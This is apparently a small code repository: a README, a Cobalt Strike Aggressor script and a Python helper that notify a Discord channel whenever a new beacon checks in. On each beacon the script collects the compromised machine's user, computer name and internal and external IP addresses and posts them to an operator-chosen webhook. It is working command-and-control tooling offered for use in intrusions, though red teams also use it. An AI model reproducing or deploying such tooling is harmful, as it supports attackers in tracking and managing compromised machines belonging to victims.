├── README.md
├── notify.cna
└── request.py


/README.md:
--------------------------------------------------------------------------------
 1 | # BeaconNotifier-Discord
 2 | Cobalt strike CNA script to notify you via Discord whenever there is a new beacon.
 3 | 
 4 | Make sure you have python3 installed
 5 | 
 6 | Steps:
 7 | 
 8 | 1) Create a Discord Server and get a Webhook URL (Server settings > Integration > Webhooks > Create/New_Webhooks > Copy Webhook URL)
 9 | 2) Paste the URL in request.py
10 | 3) Edit the path of request.py in notify.cna
11 | 4) Edit the message as you want (Optional)
12 | 5) Run the cna as following:
13 | 
14 | ./agscript [C2 IP] [C2 Port] [username] [C2 password] [path to cna]
15 | 
16 | 
17 | ![image](https://user-images.githubusercontent.com/21979646/151166400-26fbd802-e8fa-4a72-afb6-b334fb935c83.png)
18 | 
19 | 
20 | 
21 | 
22 | Reference:
23 | 
24 | https://download.cobaltstrike.com/aggressor-script/functions.html
25 | https://stackoverflow.com/questions/62731561/discord-send-message-only-from-python-app-to-discord-channel-one-way-communic
26 | 


--------------------------------------------------------------------------------
/notify.cna:
--------------------------------------------------------------------------------
 1 | #Change request path
 2 | #You can change CS to identify different CS instances
 3 | 
 4 | $pythonPath = "/PATH/request.py";
 5 | 
 6 | on beacon_initial { 
 7 |         $computer = beacon_info($1, "computer");
 8 |         $external = beacon_info($1, "external");
 9 |         $internal = beacon_info($1, "internal");
10 |         $user = beacon_info($1, "user");
11 |         $beacon_text = "================================
12 | New Beacon from CS!
13 | User : $user
14 | Computer Name : $computer
15 | External IP : $external
16 | Internal IP : $internal
17 | ================================";
18 | 	@command = @('python3',$pythonPath,$beacon_text);
19 | 	exec(@command);
20 | }
21 | 
22 | 
23 | 


--------------------------------------------------------------------------------
/request.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import requests
 3 | 
 4 | #Change webhook here
 5 | webhookurl = "XXXXXXXXXXXXX"
 6 | data = {"content": str(sys.argv[1])}
 7 | response = requests.post(webhookurl, json=data)
 8 | print(response.status_code)
 9 | print(response.content)
10 | 


--------------------------------------------------------------------------------